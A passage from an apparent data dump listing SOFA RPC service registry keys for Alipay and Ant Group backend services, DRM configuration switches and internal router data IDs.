D#@#SOFA","com.alipay.emccenter.common.service.facade.api.BemcEventManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antlescenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.service.loan.drm.DeferOperateUtilDrm.deferCreditOrgNewLoanConsultSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.kpmg.rms.module.contract.service.AccountingSubjectService:1.0@rest#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitymarketscore.common.service.facade.api.DaqProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.activity.ActivityDacuHaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:wealthyebtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecogw.facade.EcoGwTestFacade:1.0:ecoGwTestFacade_generic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbinventorycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.AccountLayoutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.BbcRiskDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.merchantinfo.MerchantInfoSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.agdsSellerWhiteListTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.kabao.KabaoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.common.service.facade.query.ControlOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igtransferprod.common.service.facade.IgtpParticipantCreditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kabaocore.service.facade.AlipassTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cdp.common.service.facade.delivery.DeliveryContentApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.rest.ProductManageSofaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.core.service.predictionmonitor.engine.PredictionAlarmEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.comparacenter.configcenter.service.facade.admin.api.publish.ConfigPublishManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.echo.platform.core.drm.EchoRecordConfigDrm.recordSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dpc.dasicube.common.service.facade.api.LogWriterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.opm.service.facade.sdk.SdkFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zcbprod.common.service.facade.appointment.service.AppointmentConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.echox.service.EchoxTaskDataWriter:1.0:echoagent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acpmscore.facade.IssueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.79.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.developertool.facade.metadata.AutoCompleteConfigManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CLOUDLEGO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.securitycap.apayCrmDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bkpromoguard.facade.ops.api.OpStatisticLevelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findefencecore.common.service.accm.facade.AccmConfigHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.facade.alarmanalysis.CrashAlarmAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchasset_purchasesQuotationCalculation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.whiteUserId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:kbbusinessprodSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_KABAO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcbenefitcore.facade.service.DiscountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wallet.partner.common.service.facade.flow.FlowTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinwormhole.common.service.facade.api.UnionSessionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppprod.RechargeOperatorProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:instantBasicContentDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.task.api.InsTaskConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.spi.CollectionSpiFacade:1.0:recruitcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.message.MessageShortUrlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfintertrade.common.service.facade.api.InterTradeApprovalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@contentfactory#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.echox.service.EchoxAopPlaybackService:1.0:ifxtrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finslipTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradequery.common.service.facade.TradeapBaseQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityConsumeDonationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.service.VariableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linkw.common.service.facade.OneKeyDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.homepage.service.UserRemindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.facade.institution.AgdsadalipayAliloanCQUnionCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.TemplateElementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pingyao_test_101@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.recommendTargetAmountOfMonth,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepromo.common.service.facade.offlinetaobao.BizAreaCampaignManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.CertificateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_P_RISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.featureVelocityTestProcessSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecquery.common.service.account.CustAcctQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbinteligentpromo.common.service.facade.api.VoiceBroadcastQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.common.service.facade.api.tag.TagManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.core.service.repository.quotation.GoldPriceRepository:1.0:memoryCachedGoldPriceRepository@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushHealthLabFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.ms.service.SofaEchoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:csrobotmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.biz.donateRPC.api.DonateServiceManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.service.facade.dataswap.DataSwapModelService:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iamlmng.core.service.common.interfaces.TaskRemarkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.180.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.2.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.97.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasset.common.service.facade.stuff.bff.StuffAttributeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:yuyankeeper#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:zeroxrisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.alipayauth.service.AlipayAuthEventMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csactive.common.service.facade.log.CloudTraceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkmerchantprod.common.service.facade.kyb.MerchantKybFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.contract.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.userriskinfo.UserRiskInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dayu.facade.service.CallTreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.recon.common.service.facade.fund.api.RegisterInstItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcommonweal.common.service.facade.api.AcwMerchantConsumeFacade:1.0:antcommonweal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.recordOptMonitorLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_PRODTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.iliquidity.biz.manager.overdraft.FundsRiskActionAdvice:1.0:transfer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.integration.dwdssp.DistributeServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.callback.OpsChngRiskServiceCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.scene.ServerlessSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.pcardsales.pcardSettleMultiDataSourceNew.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transfercenter.common.service.facade.api.TransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.limiter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.common.service.facade.backmanagement.TagManagementUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.shopcode.service.facade.api.ShopCodeBaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprotocol.common.service.facade.QualifiedInvestorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.activity.BeltnewPrizeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mrchasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.facade.release.KnowledgeStoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.StuffCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmgovbizprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.recommendStarNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.decisionx.engine.common.api.DecisionStatusService:1.0:fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.crystal.app.pagecheck.checkPage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinpromo.common.service.facade.api.goldbill.GoldBillManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue15#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.tr-service-enable:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promokernel.common.checker.facade.api.PrizeQueryCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:socialportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.content.InsIopAnswerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.clearing.ClearingRetailManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.common.service.client.integration.IfxQuoteQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.ceres.AssetCeresRtCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.paycore.PmtPtBizTypeCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sitebuilder.biz.shared.ops.FastRecoveryOpsPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.kbase.common.service.facade.api.service.TreeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:insplatformbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.asset.api.InsUserFamilyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MAPI#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:accenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundAmountUnfreezeSysCallback2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.event.UserBehaviorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfintertrade.common.service.facade.api.InterTradeAffiliateConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.profitsync.facade.ZCBAssetProfitInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ectradmng_interestDeduction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.messagefusion.facade.api.UserBoxConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mdeduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.ops.OpsCacheOperatorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.ResourceRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:opsct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.98.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ecdcc:name=com.alipay.common.session.sessionConfigDrm.dataSeparate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.serverMultiWriteOnOB,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.afwrobottwa:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mmportal:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsApiVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkibdeposit_processCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:bkfcamlmatrix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.76.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finvirtualta@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.tvm.TvmAppRegisterManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.kbase.common.service.facade.api.conf.TreeManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.sortIdExeBlacklist,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.finriskcenter.common.facade.api.guardian.OssDataSourceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gfinvoice.facade.invoice.InvoicePoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insclaimcenter.common.service.InsClaimCaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.testOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:capacitystudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mmtcaftscmdproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.SDKTest:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsapiDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.caprod.service.cert.facade.CertActionLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.compatibleQueryPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxagg.common.service.facade.api.management.community.CommunityContentAccessMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.common.service.facade.api.org.InstBizInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcswitchbase.facade.FilePreviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.watchlist.WatchlistQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.176.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.cif.client.facade.ClientReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:iholoxmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.228.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instopen.service.facade.message.InstMessageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iotcube.common.service.facade.openapi.upgrade.UpgradePackageDiffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdInstRelationService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linglongmng.presentation.rpc.TestRpcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:quotetradecoreEmergencyProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.commodity.ItemSyncTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscvprod.common.service.facade.InsClaimTraceScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.creditenjoy.AgdsccPCCreditEnjoyFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstrategycenter.common.service.facade.InspectionDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegeocoding.common.service.facade.ReverseGeoCodingService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterRcdecisionOrganFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.ArContractOperateDRM.arContractQuerySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dbsconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradefront.service.refund.api.RefundAfterTradeCompletedRecoveryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isecuritycore.common.service.integration.isupergw.ISupergwClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.LimitCaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.242.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dms.common.service.DmsExperimentService:1.0:internal@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntRoleOperatorRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_pre_open_account_file_auth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_SQ_STABLE_CRoute#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ecquery.common.service.drawndn.LoanScheduleCtrlQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.msg.MsgManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.allin.facade.KbDishItemToolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.generalorder.rate.RateMarketServiceFacade:1.0@DEFAULT#@#DEF